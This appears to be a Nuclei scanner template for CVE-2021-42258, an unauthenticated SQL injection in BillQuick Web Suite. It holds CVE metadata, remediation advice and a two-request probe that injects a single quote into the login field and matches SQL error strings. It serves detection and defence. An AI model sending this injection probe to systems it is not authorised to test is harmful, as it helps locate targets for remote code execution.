id: CVE-2021-42258 info: name: BillQuick Web Suite SQL Injection author: dwisiswant0 severity: critical description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell. impact: | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches and updates provided by the vendor to fix the SQL Injection vulnerability in the BillQuick Web Suite. reference: - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware - https://nvd.nist.gov/vuln/detail/CVE-2021-42258 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-42258 cwe-id: CWE-89 epss-score: 0.96873 epss-percentile: 0.9964 cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: bqe product: billquick_web_suite tags: cve2021,cve,sqli,billquick,kev,bqe http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST / HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} Origin: {{RootURL}} Content-Type: application/x-www-form-urlencoded __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("{{VS}}")}}&__VIEWSTATEGENERATOR={{url_encode("{{VSG}}")}}&__EVENTVALIDATION={{url_encode("{{EV}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 matchers: - type: word part: body words: - "System.Data.SqlClient.SqlException" - "Incorrect syntax near" - "_ACCOUNTLOCKED" condition: and extractors: - type: xpath name: VS internal: true xpath: - "/html/body/form/div/input[@id='__VIEWSTATE']" attribute: value - type: xpath name: VSG internal: true xpath: - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']" attribute: value - type: xpath name: EV internal: true xpath: - "/html/body/form/div/input[@id='__EVENTVALIDATION']" attribute: value # digest: 4a0a0047304502201b632f1cf99d5bcdfbf3f3bf4d4f45c923c6a1f13cfddbfeb220e0c5c27b1ce0022100ee1323180eb554e4a12178c20e5c16b82eb36091fa65a10f4d7c538714769b9e:922c64590222798bb761d5b6d8e72950